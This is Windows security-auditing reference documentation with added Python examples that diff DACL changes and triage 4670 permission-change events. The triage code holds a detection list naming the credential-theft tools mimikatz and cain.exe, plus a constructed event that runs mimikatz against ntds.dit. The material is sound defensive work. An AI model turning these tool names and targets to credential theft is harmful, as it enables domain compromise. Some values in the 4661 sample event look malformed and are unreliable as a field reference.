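            and (a.rights[0].lower().startswith("0x") or WRITE_RIGHTS & set(a.rights))]


# OldSd / NewSd exactly as they appear in the 4670 event XML above.
OLD_SD = ("D:AI(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-2104)"
          "(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-1104)(A;OICIID;FA;;;SY)(A;OICIID;FA;;;BA)")
NEW_SD = ("D:ARAI(A;OICI;FA;;;WD)(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-2104)"
          "(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-1104)(A;OICIID;FA;;;SY)(A;OICIID;FA;;;BA)")

if __name__ == "__main__":
    change = diff_dacl(OLD_SD, NEW_SD)
    print("DACL flags:", change["flags"])
    for ace in change["added"]:
        print("added:", describe_ace(ace))
    for ace in broad_grants(change["added"]):
        print("ALERT broad write grant:", describe_ace(ace))
```

The parser never searches the raw string for tokens because the same two letters mean different things by position: WD is Everyone in the account_sid field but Modify Permissions in the rights field, and FA is Failed Access Audit in ace_flags but File All Access in rights. A hex mask such as 0xf0007 is kept opaque and treated as write-class when granted to a broad principal, which errs on the side of reporting.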

Security Monitoring Recommendations
For 4670(S): Permissions on an object were changed.
For token objects, this is typically an informational event, and at the same time it is difficult to identify which token's permissions were changed. For token objects, there are no monitoring recommendations for this event in this document.
For file system and registry objects, the following recommendations apply.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you have a pre-defined “Process Name” for the process reported in this event, monitor all events with
“Process Name” not equal to your defined value.
You can monitor to see if “Process Name” is not in a standard folder (for example, not in System32 or
Program Files) or is in a restricted folder (for example, Temporary Internet Files).
If you have a pre-defined list of restricted substrings or words in process names (for example, “mimikatz” or
“cain.exe”), check for these substrings in “Process Name.”
If you have critical registry objects for which you need to monitor all modifications (especially permissions
changes and owner changes), monitor for the specific Object\Object Name.
If you have high-value computers for which you need to monitor all changes for all or specific objects (for
example, file system or registry objects), monitor for all 4670 events on these computers. For example, you
could monitor the ntds.dit file on domain controllers.
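The recommendations above turned into triage logic, as an added example that is not Microsoft's code: it flattens a 4670 event from the XML shape used throughout this document and reports which recommendation each event trips. The standard and restricted folder lists, the restricted substrings, the ntds.dit path, the host list and the sample events are all constructed, assumed values a defender would tune for their own environment.

```python
"""Triage constructed 4670 events against the recommendations above.
Added example, not Microsoft's code.  STANDARD_FOLDERS, RESTRICTED_FOLDERS,
CRITICAL_OBJECTS and HIGH_VALUE_HOSTS are assumed environment-specific values."""
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Assumed tuning values (lower-case; matching is case-insensitive).
STANDARD_FOLDERS = ("c:\\windows\\system32\\", "c:\\program files\\")
RESTRICTED_FOLDERS = ("\\temporary internet files\\", "\\appdata\\local\\temp\\")
RESTRICTED_SUBSTRINGS = ("mimikatz", "cain.exe")
CRITICAL_OBJECTS = {"c:\\windows\\ntds\\ntds.dit"}   # assumed default ntds.dit path
HIGH_VALUE_HOSTS = {"dc01.contoso.local"}


def parse_event(xml_text: str) -> Dict[str, object]:
    """Flatten a Security event into {"EventID", "Computer", <Data Name>: text}."""
    root = ET.fromstring(xml_text)
    ev: Dict[str, object] = {
        "EventID": int(root.findtext("e:System/e:EventID", default="0", namespaces=NS)),
        "Computer": root.findtext("e:System/e:Computer", default="", namespaces=NS),
    }
    for data in root.findall("e:EventData/e:Data", NS):
        ev[data.get("Name")] = data.text or ""
    return ev


def triage_4670(ev: Dict[str, object], expected_process: Optional[str] = None) -> List[str]:
    """Return the recommendations a 4670 event trips; an empty list means nothing to raise."""
    if ev["EventID"] != 4670:
        raise ValueError("not a 4670 event")
    if ev.get("ObjectType") == "Token":
        return []  # token objects are informational; the text gives no recommendation
    proc = str(ev.get("ProcessName", "")).lower()
    findings: List[str] = []
    if expected_process and proc != expected_process.lower():
        findings.append("Process Name differs from the pre-defined value")
    if not proc.startswith(STANDARD_FOLDERS):
        findings.append("Process Name is not in a standard folder")
    if any(folder in proc for folder in RESTRICTED_FOLDERS):
        findings.append("Process Name is in a restricted folder")
    findings += [f"restricted substring '{s}' in Process Name"
                 for s in RESTRICTED_SUBSTRINGS if s in proc]
    if str(ev.get("ObjectName", "")).lower() in CRITICAL_OBJECTS:
        findings.append("permissions changed on a critical object")
    if str(ev["Computer"]).lower() in HIGH_VALUE_HOSTS:
        findings.append("4670 on a high-value computer")
    return findings


def event_xml(computer: str, object_type: str, object_name: str, process_name: str) -> str:
    """Build a constructed 4670 event in the XML shape this document uses."""
    return (
        '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
        f"<System><EventID>4670</EventID><Computer>{computer}</Computer></System>"
        "<EventData>"
        f'<Data Name="ObjectType">{object_type}</Data>'
        f'<Data Name="ObjectName">{object_name}</Data>'
        f'<Data Name="ProcessName">{process_name}</Data>'
        "</EventData></Event>"
    )


# Constructed sample events (not real log data).
BENIGN = event_xml("WS01.contoso.local", "File", r"C:\Finance Documents\budget.xlsx",
                   r"C:\Windows\System32\icacls.exe")
SUSPECT = event_xml("DC01.contoso.local", "File", r"C:\Windows\NTDS\ntds.dit",
                    r"C:\Users\dadmin\AppData\Local\Temp\mimikatz.exe")
TOKEN = event_xml("DC01.contoso.local", "Token", "-", r"C:\Windows\System32\services.exe")

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("suspect", SUSPECT), ("token", TOKEN)):
        print(label, triage_4670(parse_event(sample)) or ["nothing to raise"])
```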
Audit Removable Storage
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
Audit Removable Storage allows you to audit user attempts to access file system objects on a removable storage device. A security audit event is generated for all objects and all types of access requested, with no dependency on the object’s SACL.

COMPUTER TYPE | GENERAL SUCCESS | GENERAL FAILURE | STRONGER SUCCESS | STRONGER FAILURE | COMMENTS
Domain Controller | Yes | Yes | Yes | Yes | This subcategory will help identify when and which files or folders were accessed or modified on removable devices. It is often useful to track actions with removable storage devices and the files or folders on them, because malicious software very often uses removable devices as a method to get into the system. At the same time, you will be able to track which files were written or executed from a removable storage device. You can track, for example, actions with files or folders on USB flash drives or sticks that were inserted into domain controllers or high value servers, which is typically not allowed. We recommend Failure auditing to track failed access attempts.
Member Server | Yes | Yes | Yes | Yes |
Workstation | Yes | Yes | Yes | Yes |

Events List:
4656(S, F): A handle to an object was requested.
4658(S): The handle to an object was closed.
4663(S): An attempt was made to access an object.
Audit SAM
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
Audit SAM enables you to audit events that are generated by attempts to access Security Account Manager (SAM) objects.
The Security Account Manager (SAM) is a database that is present on computers running Windows operating systems that stores user accounts and security descriptors for users on the local computer.
SAM objects include the following:
SAM_ALIAS: A local group
SAM_GROUP: A group that is not a local group
SAM_USER: A user account
SAM_DOMAIN: A domain
SAM_SERVER: A computer account
If you configure this policy setting, an audit event is generated when a SAM object is accessed. Success audits record successful attempts, and failure audits record unsuccessful attempts.
Only a SACL for SAM_SERVER can be modified.
Changes to user and group objects are tracked by the Account Management audit category. However, user accounts with enough privileges could potentially alter the files in which the account and password information is stored in the system, bypassing any Account Management events.
Event volume: High on domain controllers.
For information about reducing the number of events generated in this subcategory, see KB841001.

COMPUTER TYPE | GENERAL SUCCESS | GENERAL FAILURE | STRONGER SUCCESS | STRONGER FAILURE | COMMENTS
Domain Controller | - | - | - | - | There is no recommendation for this subcategory in this document, unless you know exactly what you need to monitor at Security Account Manager level.
Member Server | - | - | - | - | There is no recommendation for this subcategory in this document, unless you know exactly what you need to monitor at Security Account Manager level.
Workstation | - | - | - | - | There is no recommendation for this subcategory in this document, unless you know exactly what you need to monitor at Security Account Manager level.

Events List:
4661(S, F): A handle to an object was requested.
4661(S, F): A handle to an object was requested.
4/5/2019 • 12 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategories: Audit Directory Service Access and Audit SAM
Event Description:
This event indicates that a handle was requested for either an Active Directory object or a Security Account Manager (SAM) object.
If access was declined, then a Failure event is generated.
This event generates only if Success auditing is enabled for the Audit Handle Manipulation subcategory.

Note: For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4661</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>14080</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-09-30T00:11:56.547696700Z" />
    <EventRecordID>1048009</EventRecordID>
    <Correlation />
    <Execution ProcessID="520" ThreadID="528" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="SubjectUserName">dadmin</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x4280e</Data>
    <Data Name="ObjectServer">Security Account Manager</Data>
    <Data Name="ObjectType">SAM_DOMAIN</Data>
    <Data Name="ObjectName">DC=contoso,DC=local</Data>
    <Data Name="HandleId">0xdd64d36870</Data>
    <Data Name="TransactionId">{00000000-0000-0000-0000-000000000000}</Data>
    <Data Name="AccessList">%%5400</Data>
    <Data Name="AccessMask">0x2d</Data>
    <Data Name="PrivilegeList">Ā</Data>
    <Data Name="Properties">-</Data>
    <Data Name="RestrictedSidCount">2949165</Data>
    <Data Name="ProcessId">0x9000a000d002d</Data>
    <Data Name="ProcessName">{bf967a90-0de6-11d0-a285-00aa003049e2} %%5400 {ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501}</Data>
  </EventData>
</Event>

Required Server Roles: For an Active Directory object, the domain controller role is required. For a SAM object,
there is no required role.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of the account that requested a handle to an object. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note: A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested a handle to an object.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Object:
Object Server [Type = UnicodeString]: has “Security Account Manager” value for this event.
Object Type [Type = UnicodeString]: the type or class of the object that was accessed. The following list
contains possible values for this field:
SAM_ALIAS - a local group.
SAM_GROUP - a group that is not a local group.
SAM_USER - a user account.
SAM_DOMAIN - a domain. For Active Directory events, this is the typical value.
SAM_SERVER - a computer account.
Object Name [Type = UnicodeString]: the name of an object for which access was requested. Depends on
Object Type. This event can have the following format:
SAM_ALIAS – SID of the group.
SAM_GROUP - SID of the group.
SAM_USER - SID of the account.
SAM_DOMAIN – distinguished name of the accessed object.
SAM_SERVER - distinguished name of the accessed object.

Note: The LDAP API references an LDAP object by its distinguished name (DN). A DN is a sequence of relative distinguished names (RDN) connected by commas.
An RDN is an attribute with an associated value in the form attribute=value. These are examples of RDN attributes:
• DC - domainComponent
• CN - commonName
• OU - organizationalUnitName
• O - organizationName

Handle ID [Type = Pointer]: hexadecimal value of a handle to Object Name. This field can help you correlate
this event with other events that might contain the same Handle ID, for example, “4662: An operation was
performed on an object.” This parameter might not be captured in the event, and in that case appears as “0x0”.
Process Information:
Process ID [Type = Pointer]: hexadecimal Process ID of the process that requested the handle. Process ID (PID) is a number used by the operating system to uniquely identify an active process. To see the PID for a specific process you can, for example, use Task Manager (Details tab, PID column):

If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
Process Name [Type = UnicodeString]: full path and the name of the executable for the process.
Access Request Information:
Transaction ID [Type = GUID]: unique GUID of the transaction. This field can help you correlate this event with other events that might contain the same Transaction ID, such as “4660(S): An object was deleted.”
This parameter might not be captured in the event, and in that case appears as “{00000000-0000-0000-0000-000000000000}”.

Note: GUID is an acronym for 'Globally Unique Identifier'. It is a 128-bit integer number used to identify resources, activities or instances.

Accesses [Type = UnicodeString]: the list of access rights which were requested by Subject\Security ID. These access rights depend on Object Type. See “Table 13. File access codes.” for more information about file access rights. For information about SAM object access rights, use https://technet.microsoft.com/ or other informational resources.
Access Mask [Type = HexInt32]: hexadecimal mask for the operation that was requested or performed. See “Table 13. File access codes.” for more information about file access rights. For information about SAM object access rights, use https://technet.microsoft.com/ or other informational resources.
Privileges Used for Access Check [Type = UnicodeString]: the list of user privileges which were used during the operation, for example, SeBackupPrivilege. This parameter might not be captured in the event, and in that case appears as “-”. See the full list of user privileges in the table below:
PRIVILEGE NAME | USER RIGHT GROUP POLICY NAME | DESCRIPTION
SeAssignPrimaryTokenPrivilege | Replace a process-level token | Required to assign the primary token of a process. With this privilege, the user can initiate a process to replace the default token associated with a started subprocess.
SeAuditPrivilege | Generate security audits | With this privilege, the user can add entries to the security log.
SeBackupPrivilege | Back up files and directories | Required to perform backup operations. With this privilege, the user can bypass file and directory, registry, and other persistent object permissions for the purposes of backing up the system. This privilege causes the system to grant all read access control to any file, regardless of the access control list (ACL) specified for the file. Any access request other than read is still evaluated with the ACL. The following access rights are granted if this privilege is held: READ_CONTROL, ACCESS_SYSTEM_SECURITY, FILE_GENERIC_READ, FILE_TRAVERSE.
SeChangeNotifyPrivilege | Bypass traverse checking | Required to receive notifications of changes to files or directories. This privilege also causes the system to skip all traversal access checks. With this privilege, the user can traverse directory trees even though the user may not have permissions on the traversed directory. This privilege does not allow the user to list the contents of a directory, only to traverse directories.
SeCreateGlobalPrivilege | Create global objects | Required to create named file mapping objects in the global namespace during Terminal Services sessions.
SeCreatePagefilePrivilege | Create a pagefile | With this privilege, the user can create and change the size of a pagefile.
SeCreatePermanentPrivilege | Create permanent shared objects | Required to create a permanent object. This privilege is useful to kernel-mode components that extend the object namespace. Components that are running in kernel mode already have this privilege inherently; it is not necessary to assign them the privilege.
SeCreateSymbolicLinkPrivilege | Create symbolic links | Required to create a symbolic link.
SeCreateTokenPrivilege | Create a token object | Allows a process to create a token which it can then use to get access to any local resources when the process uses NtCreateToken() or other token-creation APIs. When a process requires this privilege, we recommend using the LocalSystem account (which already includes the privilege), rather than creating a separate user account and assigning this privilege to it.
SeDebugPrivilege | Debug programs | Required to debug and adjust the memory of a process owned by another account. With this privilege, the user can attach a debugger to any process or to the kernel. Developers who are debugging their own applications do not need this user right. Developers who are debugging new system components need this user right. This user right provides complete access to sensitive and critical operating system components.
SeEnableDelegationPrivilege | Enable computer and user accounts to be trusted for delegation | Required to mark user and computer accounts as trusted for delegation. With this privilege, the user can set the Trusted for Delegation setting on a user or computer object. The user or object that is granted this privilege must have write access to the account control flags on the user or computer object. A server process running on a computer (or under a user context) that is trusted for delegation can access resources on another computer using the delegated credentials of a client, as long as the account of the client does not have the Account cannot be delegated account control flag set.
SeImpersonatePrivilege | Impersonate a client after authentication | With this privilege, the user can impersonate other accounts.
SeIncreaseBasePriorityPrivilege | Increase scheduling priority | Required to increase the base priority of a process. With this privilege, the user can use a process with Write property access to another process to increase the execution priority assigned to the other process. A user with this privilege can change the scheduling priority of a process through the Task Manager user interface.
SeIncreaseQuotaPrivilege | Adjust memory quotas for a process | Required to increase the quota assigned to a process. With this privilege, the user can change the maximum memory that can be consumed by a process.
SeIncreaseWorkingSetPrivilege | Increase a process working set | Required to allocate more memory for applications that run in the context of users.
SeLoadDriverPrivilege | Load and unload device drivers | Required to load or unload a device driver. With this privilege, the user can dynamically load and unload device drivers or other code into kernel mode. This user right does not apply to Plug and Play device drivers.
SeLockMemoryPrivilege | Lock pages in memory | Required to lock physical pages in memory. With this privilege, the user can use a process to keep data in physical memory, which prevents the system from paging the data to virtual memory on disk. Exercising this privilege could significantly affect system performance by decreasing the amount of available random access memory (RAM).
SeMachineAccountPrivilege | Add workstations to domain | With this privilege, the user can create a computer account. This privilege is valid only on domain controllers.
SeManageVolumePrivilege | Perform volume maintenance tasks | Required to run maintenance tasks on a volume, such as remote defragmentation.
SeProfileSingleProcessPrivilege | Profile single process | Required to gather profiling information for a single process. With this privilege, the user can use performance monitoring tools to monitor the performance of non-system processes.
SeRelabelPrivilege | Modify an object label | Required to modify the mandatory integrity level of an object.
SeRemoteShutdownPrivilege | Force shutdown from a remote system | Required to shut down a system using a network request.
SeRestorePrivilege | Restore files and directories | Required to perform restore operations. This privilege causes the system to grant all write access control to any file, regardless of the ACL specified for the file. Any access request other than write is still evaluated with the ACL. Additionally, this privilege enables you to set any valid user or group SID as the owner of a file. The following access rights are granted if this privilege is held: WRITE_DAC, WRITE_OWNER, ACCESS_SYSTEM_SECURITY, FILE_GENERIC_WRITE, FILE_ADD_FILE, FILE_ADD_SUBDIRECTORY, DELETE. With this privilege, the user can bypass file, directory, registry, and other persistent object permissions when restoring backed up files and directories, and it determines which users can set any valid security principal as the owner of an object.
SeSecurityPrivilege | Manage auditing and security log | Required to perform a number of security-related functions, such as controlling and viewing audit events in the security event log. With this privilege, the user can specify object access auditing options for individual resources, such as files, Active Directory objects, and registry keys. A user with this privilege can also view and clear the security log.
SeShutdownPrivilege | Shut down the system | Required to shut down a local system.
SeSyncAgentPrivilege | Synchronize directory service data | This privilege enables the holder to read all objects and properties in the directory, regardless of the protection on the objects and properties. By default, it is assigned to the Administrator and LocalSystem accounts on domain controllers. With this privilege, the user can synchronize all directory service data. This is also known as Active Directory synchronization.
SeSystemEnvironmentPrivilege | Modify firmware environment values | Required to modify the nonvolatile RAM of systems that use this type of memory to store configuration information.
SeSystemProfilePrivilege | Profile system performance | Required to gather profiling information for the entire system. With this privilege, the user can use performance monitoring tools to monitor the performance of system processes.
SeSystemtimePrivilege | Change the system time | Required to modify the system time. With this privilege, the user can change the time and date on the internal clock of the computer. Users that are assigned this user right can affect the appearance of event logs. If the system time is changed, events that are logged will reflect this new time, not the actual time that the events occurred.
SeTakeOwnershipPrivilege | Take ownership of files or other objects | Required to take ownership of an object without being granted discretionary access. This privilege allows the owner value to be set only to those values that the holder may legitimately assign as the owner of an object. With this privilege, the user can take ownership of any securable object in the system, including Active Directory objects, files and folders, printers, registry keys, processes, and threads.
SeTcbPrivilege | Act as part of the operating system | This privilege identifies its holder as part of the trusted computer base. This user right allows a process to impersonate any user without authentication. The process can therefore gain access to the same local resources as that user.
SeTimeZonePrivilege | Change the time zone | Required to adjust the time zone associated with the computer's internal clock.
SeTrustedCredManAccessPrivilege | Access Credential Manager as a trusted caller | Required to access Credential Manager as a trusted caller.
SeUndockPrivilege | Remove computer from docking station | Required to undock a laptop. With this privilege, the user can undock a portable computer from its docking station without logging on.
SeUnsolicitedInputPrivilege | Not applicable | Required to read unsolicited input from a terminal device.


Properties [Type = UnicodeString]: depends on Object Type. This field can be empty or contain the list of
the object properties that were accessed. See more detailed information in “4661: A handle to an object
was requested” from Audit SAM subcategory.
Restricted SID Count [Type = UInt32]: Number of restricted SIDs in the token. Applicable to only specific
Object Types.
Security Monitoring Recommendations
For 4661(S, F): A handle to an object was requested.

Important: For this event, also see Appendix A: Security monitoring recommendations for many audit events.

You can get almost the same information from “4662: An operation was performed on an object.” There are no additional recommendations for this event in this document.
Audit Central Access Policy Staging
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
Audit Central Access Policy Staging allows you to audit access requests where a permission granted or denied by a proposed policy differs from the current central access policy on an object.
If you configure this policy setting, an audit event is generated each time a user accesses an object and the permission granted by the current central access policy on the object differs from that granted by the proposed policy. The resulting audit event is generated as follows:
• Success audits, when configured, record access attempts when the current central access policy grants access, but the proposed policy denies access.
• Failure audits, when configured, record access attempts when:
  • The current central access policy does not grant access, but the proposed policy grants access.
  • A principal requests the maximum access rights they are allowed and the access rights granted by the current central access policy are different than the access rights granted by the proposed policy.

COMPUTER TYPE | GENERAL SUCCESS | GENERAL FAILURE | STRONGER SUCCESS | STRONGER FAILURE | COMMENTS
Domain Controller | IF | No | IF | No | IF - Enable this subcategory if you need to test or troubleshoot Dynamic Access Control Proposed Central Access Policies. This subcategory doesn’t have Failure events, so there is no recommendation to enable Failure auditing for this subcategory.
Member Server | IF | No | IF | No | IF - Enable this subcategory if you need to test or troubleshoot Dynamic Access Control Proposed Central Access Policies. This subcategory doesn’t have Failure events, so there is no recommendation to enable Failure auditing for this subcategory.
Workstation | IF | No | IF | No | IF - Enable this subcategory if you need to test or troubleshoot Dynamic Access Control Proposed Central Access Policies. This subcategory doesn’t have Failure events, so there is no recommendation to enable Failure auditing for this subcategory.

Events List:
4818(S): Proposed Central Access Policy does not grant the same access permissions as the current Central Access Policy.
4818(S): Proposed Central Access Policy does not grant the same access permissions as the current Central Access Policy.
4/5/2019 • 8 minutes to read

Applies to
Windows 10
Windows Server 2016

Subcategory: Audit Central Access Policy Staging

Event Description:
This event generates when Dynamic Access Control Proposed Central Access Policy is enabled and access was not granted by the Proposed Central Access Policy.

Note: For recommendations, see Security Monitoring Recommendations for this event.
Event XML:

<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4818</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>12813</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-09-30T16:37:29.473472100Z" />
    <EventRecordID>1049324</EventRecordID>
    <Correlation />
    <Execution ProcessID="516" ThreadID="524" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-2104</Data>
    <Data Name="SubjectUserName">Auditor</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x1e5f21</Data>
    <Data Name="ObjectServer">Security</Data>
    <Data Name="ObjectType">File</Data>
    <Data Name="ObjectName">C:\Finance Documents\desktop.ini</Data>
    <Data Name="HandleId">0xc64</Data>
    <Data Name="ProcessId">0x4</Data>
    <Data Name="ProcessName" />
    <Data Name="AccessReason">%%1538: %%1801 D:(A;ID;0x1200a9;;;BU) %%1541: %%1801 D:(A;ID;0x1200a9;;;BU) %%4416: %%1801 D:(A;ID;0x1200a9;;;BU) %%4419: %%1801 D:(A;ID;0x1200a9;;;BU) %%4423: %%1801 D:(A;ID;0x1200a9;;;BU)</Data>
    <Data Name="StagingReason">%%1538: %%1814Finance Documents Rule %%1541: %%1814Finance Documents Rule %%4416: %%1814Finance Documents Rule %%4419: %%1814Finance Documents Rule %%4423: %%1814Finance Documents Rule</Data>
  </EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2012, Windows 8.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of the account that made an access request. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note: A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.
Account Name [Type = UnicodeString]: the name of the account that made an access request.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Object:
Object Server [Type = UnicodeString]: has “Security” value for this event.
Object Type [Type = UnicodeString]: The type of an object that was accessed during the operation. Always “File” for this event.
The following list contains the most common Object Types: Directory, Event, Timer, Device, Mutant, Type, File, Token, Thread, Section, WindowStation, DebugObject, FilterCommunicationPort, EventPair, Driver, IoCompletion, Controller, SymbolicLink, WmiGuid, Process, Profile, Desktop, KeyedEvent, Adapter, Key, WaitablePort, Callback, Semaphore, Job, Port, FilterConnectionPort, ALPC Port.

Object Name [Type = UnicodeString]: full path and name of the file or folder for which access was
requested.
Handle ID [Type = Pointer]: hexadecimal value of a handle to Object Name. This field can help you correlate this event with other events that might contain the same Handle ID, for example, “4663(S): An attempt was made to access an object.” This parameter might not be captured in the event, and in that case appears as “0x0”.
Process Information:
Process ID [Type = Pointer]: hexadecimal Process ID of the process through which the access was requested. Process ID (PID) is a number used by the operating system to uniquely identify an active process. To see the PID for a specific process you can, for example, use Task Manager (Details tab, PID column):
If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new process has been created” Process Information\New Process ID.
Process Name [Type = UnicodeString]: full path and the name of the executable for the process.
Current Central Access Policy results:
Access Reasons [Type = UnicodeString]: the list of access check results for the Current Access Policy. The format of each result is:

REQUESTED_ACCESS: RESULT ACE_WHICH_PROVIDED_OR_DENIED_ACCESS.

The possible REQUESTED_ACCESS values are listed in the table below.

Table of file access codes

ACCESS | HEXADECIMAL VALUE | DESCRIPTION
ReadData (or ListDirectory) | 0x1 | ReadData - For a file object, the right to read the corresponding file data. For a directory object, the right to read the corresponding directory data. ListDirectory - For a directory, the right to list the contents of the directory.
WriteData (or AddFile) | 0x2 | WriteData - For a file object, the right to write data to the file. For a directory object, the right to create a file in the directory (FILE_ADD_FILE). AddFile - For a directory, the right to create a file in the directory.
AppendData (or AddSubdirectory or CreatePipeInstance) | 0x4 | AppendData - For a file object, the right to append data to the file. (For local files, write operations will not overwrite existing data if this flag is specified without FILE_WRITE_DATA.) For a directory object, the right to create a subdirectory (FILE_ADD_SUBDIRECTORY). AddSubdirectory - For a directory, the right to create a subdirectory. CreatePipeInstance - For a named pipe, the right to create a pipe.
ReadEA | 0x8 | The right to read extended file attributes.
WriteEA | 0x10 | The right to write extended file attributes.
Execute/Traverse | 0x20 | Execute - For a native code file, the right to execute the file. This access right given to scripts may cause the script to be executable, depending on the script interpreter. Traverse - For a directory, the right to traverse the directory. By default, users are assigned the BYPASS_TRAVERSE_CHECKING privilege, which ignores the FILE_TRAVERSE access right. See the remarks in File Security and Access Rights for more information.
DeleteChild | 0x40 | For a directory, the right to delete a directory and all the files it contains, including read-only files.
ReadAttributes | 0x80 | The right to read file attributes.
WriteAttributes | 0x100 | The right to write file attributes.
DELETE | 0x10000 | The right to delete the object.
READ_CONTROL | 0x20000 | The right to read the information in the object's security descriptor, not including the information in the system access control list (SACL).
WRITE_DAC | 0x40000 | The right to modify the discretionary access control list (DACL) in the object's security descriptor.
WRITE_OWNER | 0x80000 | The right to change the owner in the object's security descriptor.
SYNCHRONIZE | 0x100000 | The right to use the object for synchronization. This enables a thread to wait until the object is in the signaled state. Some object types do not support this access right.
ACCESS_SYS_SEC | 0x1000000 | The ACCESS_SYS_SEC access right controls the ability to get or set the SACL in an object's security descriptor.


RESULT:
Granted by
Denied by
Granted by ACE on parent folder
Not granted due to missing – after this sentence you will typically see missing user rights, for example SeSecurityPrivilege.
Unknown or unchecked
ACE_WHICH_PROVIDED_OR_DENIED_ACCESS:
Ownership – if access was granted because of ownership of an object.
User Right name, for example SeSecurityPrivilege.
The Security Descriptor Definition Language (SDDL) value for the Access Control Entry (ACE) that granted or denied access.
Proposed Central Access Policy results that differ from the current Central Access Policy results:
Access Reasons [Type = UnicodeString]: the list of access check results for Proposed Central Access Policy. Here you will see only denied requests. The format of the result is:

REQUESTED_ACCESS: NOT Granted by RULE_NAME Rule.

The possible REQUESTED_ACCESS values are the same as those listed in the table of file access codes above.

RULE_NAME: the name of Central Access Rule which denied the access.

Security Monitoring Recommendations


For 4818(S): Proposed Central Access Policy does not grant the same access permissions as the current Central Access Policy.
This event is typically used for troubleshooting and testing of Proposed Central Access Policies for Dynamic Access Control.
Audit Audit Policy Change
4/5/2019

Applies to
Windows 10
Windows Server 2016
Audit Audit Policy Change determines whether the operating system generates audit events when changes are
made to audit policy.
Event volume: Low.

COMPUTER TYPE | GENERAL SUCCESS | GENERAL FAILURE | STRONGER SUCCESS | STRONGER FAILURE | COMMENTS
Domain Controller | Yes | No | Yes | No | Almost all events in this subcategory have security relevance and should be monitored. This subcategory doesn’t have Failure events, so there is no recommendation to enable Failure auditing for this subcategory.
Member Server | Yes | No | Yes | No | Same comment as for Domain Controller.
Workstation | Yes | No | Yes | No | Same comment as for Domain Controller.

Changes to audit policy that are audited include:
Changing permissions and audit settings on the audit policy object (by using the “auditpol /set /sd” command).
Changing the system audit policy.
Registering and unregistering security event sources.
Changing per-user audit settings.
Changing the value of CrashOnAuditFail.
